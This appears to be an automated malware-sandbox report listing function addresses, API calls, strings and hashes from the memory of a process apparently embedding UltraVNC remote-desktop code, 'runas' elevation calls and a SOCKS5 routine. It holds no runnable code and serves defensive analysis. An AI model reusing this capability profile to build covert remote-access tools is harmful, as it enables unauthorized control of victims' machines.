Opcode ID: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
Instruction ID: 3f3f0044405978c82d9321e19ad044c64d1396d807b062a0351ae377c20921d6
Opcode Fuzzy Hash: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
Instruction Fuzzy Hash: A8416D23A3DA4282E6509B55F840139B2A5BFA8BC4F140475F98DCBBA5EF3CE45CC700

Function 00007FF67E884BE4 Relevance: 13.6, APIs: 9, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF67E884C43
_errno.LIBCMT ref: 00007FF67E884C79
_errno.LIBCMT ref: 00007FF67E884C87
_errno.LIBCMT ref: 00007FF67E884C90
_errno.LIBCMT ref: 00007FF67E884CD1
_errno.LIBCMT ref: 00007FF67E884CDB
_errno.LIBCMT ref: 00007FF67E884CFE
_invalid_parameter_noinfo.LIBCMT ref: 00007FF67E884D09

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: d011579407d24bdfbb9aadfd6c0a3b9405857a9de314b67aa1550ae6c8c7f008
Instruction ID: 695c0bf299ef26faa5b3998d12adaeba3e9e21563c282567da85055fa38ec379
Opcode Fuzzy Hash: d011579407d24bdfbb9aadfd6c0a3b9405857a9de314b67aa1550ae6c8c7f008
Instruction Fuzzy Hash: 0F31AF37A3875288EA609F92940016CF255BF66BA0F584632FE5C837D6DF3CE418C300

Function 00007FF67E7E4CDB Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF67E7E407F
CloseDesktop.USER32 ref: 00007FF67E7E40C2

Strings

vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF67E7E409A
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF67E7E4060
vncservice.cpp : SelectDesktop , xrefs: 00007FF67E7E404B
vncclient.cpp : vncClientThread , xrefs: 00007FF67E7E4029

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$CloseInputOpen
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 1367241101-3977938048
Opcode ID: f6cdd6782624a4e5c6a8136b039a067c6538edc3eea74ebc030ec03bf903a74b
Instruction ID: b1b3e684ea3df7a0e3590b20af68316a1d5310d234f442cd998540c13b0b193d
Opcode Fuzzy Hash: f6cdd6782624a4e5c6a8136b039a067c6538edc3eea74ebc030ec03bf903a74b
Instruction Fuzzy Hash: 60C1C223A28AC185FB50CB25C4597FE6BA5EBA5B84F194131EA4C8B7E5DF3CE449C700

Function 00007FF67E7E7BB4 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 210COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF67E7E407F
CloseDesktop.USER32 ref: 00007FF67E7E40C2

Strings

vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF67E7E409A
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF67E7E4060
vncservice.cpp : SelectDesktop , xrefs: 00007FF67E7E404B
vncclient.cpp : vncClientThread , xrefs: 00007FF67E7E4029

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$CloseInputOpen
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 1367241101-3977938048
Opcode ID: 47211445917a2fe33d9bd0dd538afe367969b15db1aee06732e003ef7b4f3ddc
Instruction ID: b721cf953081675ede7d3e1d19cd46a17afbe1699a64155e137dd9acceb44560
Opcode Fuzzy Hash: 47211445917a2fe33d9bd0dd538afe367969b15db1aee06732e003ef7b4f3ddc
Instruction Fuzzy Hash: D4B1D423A18AC185FB50CB25C4497FE6BA5EBA5B44F194131EA4C8B7A5DF3CE449C700

Function 00007FF67E7EBD70 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 189memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E87A220: _errno.LIBCMT ref: 00007FF67E87A168
Part of subcall function 00007FF67E87A220: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E87A173

GetTempPathA.KERNEL32 ref: 00007FF67E7EBDFD
sprintf.LIBCMT ref: 00007FF67E7EBF6C

Part of subcall function 00007FF67E877C50: _errno.LIBCMT ref: 00007FF67E877C88
Part of subcall function 00007FF67E877C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E877C93

GlobalAlloc.KERNEL32 ref: 00007FF67E7EBFFF

Strings

.zip, xrefs: 00007FF67E7EBF3B
%s%s%s%s, xrefs: 00007FF67E7EBF5E
!UVNCDIR-, xrefs: 00007FF67E7EBF50
\*.*, xrefs: 00007FF67E7EBFDC

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo$AllocGlobalPathTempsprintf
String ID: !UVNCDIR-$%s%s%s%s$.zip$\*.*
API String ID: 3897446562-3886131270
Opcode ID: a5e006efe04d664e07b53d64243aa38d9558d9fe088fd9a2bf60d0eb440ea4a3
Instruction ID: 196f7eccf1eec18f49e6a9c637eaaeff1bdace99091547ecbc506d0fa1508e5c
Opcode Fuzzy Hash: a5e006efe04d664e07b53d64243aa38d9558d9fe088fd9a2bf60d0eb440ea4a3
Instruction Fuzzy Hash: A8817C22628B8699EB20CB74D8003ED7760FB557A4F504332EABD97AD9DF6CD50AC700

Function 00007FF67E7F00F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetDeviceCaps.GDI32 ref: 00007FF67E7F0113
GetDeviceCaps.GDI32 ref: 00007FF67E7F0140
GetDeviceCaps.GDI32 ref: 00007FF67E7F016D

Part of subcall function 00007FF67E7CA040: OpenInputDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA07A
Part of subcall function 00007FF67E7CA040: GetCurrentThreadId.KERNEL32 ref: 00007FF67E7CA083
Part of subcall function 00007FF67E7CA040: GetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA08B
Part of subcall function 00007FF67E7CA040: SetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0A6
Part of subcall function 00007FF67E7CA040: MessageBoxA.USER32 ref: 00007FF67E7CA0B7
Part of subcall function 00007FF67E7CA040: SetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0C2
Part of subcall function 00007FF67E7CA040: CloseDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0CB

Strings

vncDesktop : current display is PLANAR, not CHUNKY!WinVNC cannot be used with this graphics device driver, xrefs: 00007FF67E7F017F
vncdesktop.cpp : DBG:memory context has %d planes!, xrefs: 00007FF67E7F0146
WinVNC, xrefs: 00007FF67E7F0178
vncdesktop.cpp : DBG:display context has %d planes!, xrefs: 00007FF67E7F0119

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CapsDevice$CloseCurrentInputMessageOpen
String ID: WinVNC$vncDesktop : current display is PLANAR, not CHUNKY!WinVNC cannot be used with this graphics device driver$vncdesktop.cpp : DBG:display context has %d planes!$vncdesktop.cpp : DBG:memory context has %d planes!
API String ID: 3271485511-23260621
Opcode ID: aceaff558d4e77a2f2eec4c4dc82cdcf6baf6394409946313555329e23b774f0
Instruction ID: 92afe53d98426e1af4aedc0e195606612a7900b4a4f0b1fb04080f7d4c34d131
Opcode Fuzzy Hash: aceaff558d4e77a2f2eec4c4dc82cdcf6baf6394409946313555329e23b774f0
Instruction Fuzzy Hash: 01217E776285C685E7048FB5D4107E82765EB68B09F480437EE8CDB799DE7CD18AC720

Function 00007FF67E82A3B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 51threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF67E82A3E3
GetThreadDesktop.USER32 ref: 00007FF67E82A3EB
GetUserObjectInformationA.USER32 ref: 00007FF67E82A411
SetThreadDesktop.USER32 ref: 00007FF67E82A471

Strings

vncservice.cpp : !GetUserObjectInformation , xrefs: 00007FF67E82A424
vncservice.cpp : SelectHDESK:!SetThreadDesktop , xrefs: 00007FF67E82A47B
vncservice.cpp : SelectHDESK to %s (%x) from %x, xrefs: 00007FF67E82A458

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Thread$Desktop$CurrentInformationObjectUser
String ID: vncservice.cpp : !GetUserObjectInformation $vncservice.cpp : SelectHDESK to %s (%x) from %x$vncservice.cpp : SelectHDESK:!SetThreadDesktop
API String ID: 3041254040-2700308907
Opcode ID: 4f8d2c7db47c5d763c9f183b5bfa44873fa21b71b4771b800020d903ae877d61
Instruction ID: 82a63720b25a5f2363b0fcb314456569050b1bddfa33d7842301f3cfe1711685
Opcode Fuzzy Hash: 4f8d2c7db47c5d763c9f183b5bfa44873fa21b71b4771b800020d903ae877d61
Instruction Fuzzy Hash: 95213036E2CA8281EB60DB55B9083FAA3A9FFB8754F540132E54E8A654DE3CE04DC700

Function 00007FF67E7D3E20 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF67E7D3E4C
GetModuleFileNameA.KERNEL32 ref: 00007FF67E7D3E6C
GetForegroundWindow.USER32 ref: 00007FF67E7D3E7B
ShellExecuteExA.SHELL32 ref: 00007FF67E7D3ECA

Strings

runas, xrefs: 00007FF67E7D3E86
p, xrefs: 00007FF67E7D3E72
-softwarecad, xrefs: 00007FF67E7D3EAD

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellVersionWindow
String ID: -softwarecad$p$runas
API String ID: 397093096-2208381721
Opcode ID: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
Instruction ID: c242861539071678ad9d9f26406b8e064d9ed2b65196c209ee7d2094103b19c7
Opcode Fuzzy Hash: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
Instruction Fuzzy Hash: 1C11CC36A28B8195E7709F54F49939AB3A4FB98745F400235E68D42BA8DF7CD158CB00

Function 00007FF67E7D3D50 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF67E7D3D7C
GetModuleFileNameA.KERNEL32 ref: 00007FF67E7D3D9C
GetForegroundWindow.USER32 ref: 00007FF67E7D3DAB
ShellExecuteExA.SHELL32 ref: 00007FF67E7D3DFA

Strings

runas, xrefs: 00007FF67E7D3DB6
-delsoftwarecad, xrefs: 00007FF67E7D3DDD
p, xrefs: 00007FF67E7D3DA2

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellVersionWindow
String ID: -delsoftwarecad$p$runas
API String ID: 397093096-3343046257
Opcode ID: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
Instruction ID: ab7036e1348f19cbfefdda6a4b56e2e236990cefaa816dbc90a11b4cbb727417
Opcode Fuzzy Hash: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
Instruction Fuzzy Hash: 2111CC36928B8195E7709F54F49939AB3A4FB98745F400235E68D42BA8DF7CD158CB40

Function 00007FF67E857400 Relevance: 12.1, APIs: 8, Instructions: 62synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E857320: TlsGetValue.KERNEL32(?,?,00000000,00007FF67E857423), ref: 00007FF67E857338
Part of subcall function 00007FF67E857320: EnterCriticalSection.KERNEL32(?,?,00000000,00007FF67E857423), ref: 00007FF67E857352
Part of subcall function 00007FF67E857320: LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF67E857423), ref: 00007FF67E8573E3

EnterCriticalSection.KERNEL32 ref: 00007FF67E857427
LeaveCriticalSection.KERNEL32 ref: 00007FF67E857472
LeaveCriticalSection.KERNEL32 ref: 00007FF67E85747B
WaitForSingleObject.KERNEL32 ref: 00007FF67E85748A
EnterCriticalSection.KERNEL32 ref: 00007FF67E857495
GetLastError.KERNEL32 ref: 00007FF67E8574A7
EnterCriticalSection.KERNEL32 ref: 00007FF67E8574DE
LeaveCriticalSection.KERNEL32 ref: 00007FF67E857500

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleValueWait
String ID:
API String ID: 3883107862-0
Opcode ID: 2d3a207cf1e61dbd628a562107760b45f8588eac2b273cc230bde13b8ab52e88
Instruction ID: 878c7b5c70131846f5800fd9ff31bc638a2287b61e8ec8f26e84d93395a34aa6
Opcode Fuzzy Hash: 2d3a207cf1e61dbd628a562107760b45f8588eac2b273cc230bde13b8ab52e88
Instruction Fuzzy Hash: 53312D37A28B4696EB109F24E4443ADB3A4FBA8B94F444135EA8E87765CF3CD59DC700

Function 00007FF67E8876E8 Relevance: 12.1, APIs: 8, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

_FF_MSGBANNER.LIBCMT ref: 00007FF67E88770F

Part of subcall function 00007FF67E882ED0: _set_error_mode.LIBCMT ref: 00007FF67E882ED9
Part of subcall function 00007FF67E882ED0: _set_error_mode.LIBCMT ref: 00007FF67E882EE8

Part of subcall function 00007FF67E882C70: _set_error_mode.LIBCMT ref: 00007FF67E882CB5
Part of subcall function 00007FF67E882C70: _set_error_mode.LIBCMT ref: 00007FF67E882CC6
Part of subcall function 00007FF67E882C70: GetModuleFileNameW.KERNEL32 ref: 00007FF67E882D28

Part of subcall function 00007FF67E87ABD8: ExitProcess.KERNEL32 ref: 00007FF67E87ABE7

Part of subcall function 00007FF67E88326C: malloc.LIBCMT ref: 00007FF67E883297
Part of subcall function 00007FF67E88326C: Sleep.KERNEL32(?,?,?,00007FF67E887749,?,?,?,00007FF67E8877F3), ref: 00007FF67E8832AA

_errno.LIBCMT ref: 00007FF67E887751
_lock.LIBCMT ref: 00007FF67E887765
InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,00007FF67E8877F3), ref: 00007FF67E88777B
free.LIBCMT ref: 00007FF67E887788
_errno.LIBCMT ref: 00007FF67E88778D
LeaveCriticalSection.KERNEL32(?,?,?,00007FF67E8877F3), ref: 00007FF67E8877B0

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
String ID:
API String ID: 113790786-0
Opcode ID: ab297a067351a709e4edac81291c778a22c0a59f8ebf175c2e86f69f3e49f6c1
Instruction ID: bb26a059e9ba9f095b7a37c9cb99d17274938b3d5f264987114994617a86cb29
Opcode Fuzzy Hash: ab297a067351a709e4edac81291c778a22c0a59f8ebf175c2e86f69f3e49f6c1
Instruction Fuzzy Hash: 23217927E3D60282F660BB51A40077EE2A4EFA1780F544535FA8EC66C2CF3CE888C350

Function 00007FF67E7CC0C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 201networkCOMMON

Download Yara Rule

APIs

_wgetenv.LIBCMT ref: 00007FF67E7CC104

Part of subcall function 00007FF67E879500: _errno.LIBCMT ref: 00007FF67E879515
Part of subcall function 00007FF67E879500: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E879520

send.WS2_32 ref: 00007FF67E7CC191
recv.WS2_32 ref: 00007FF67E7CC1C1
send.WS2_32 ref: 00007FF67E7CC2A2
recv.WS2_32 ref: 00007FF67E7CC2D1

Part of subcall function 00007FF67E7CBB70: recv.WS2_32 ref: 00007FF67E7CBBAF

Strings

SOCKS5_AUTH, xrefs: 00007FF67E7CC0FD, 00007FF67E7CC111

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
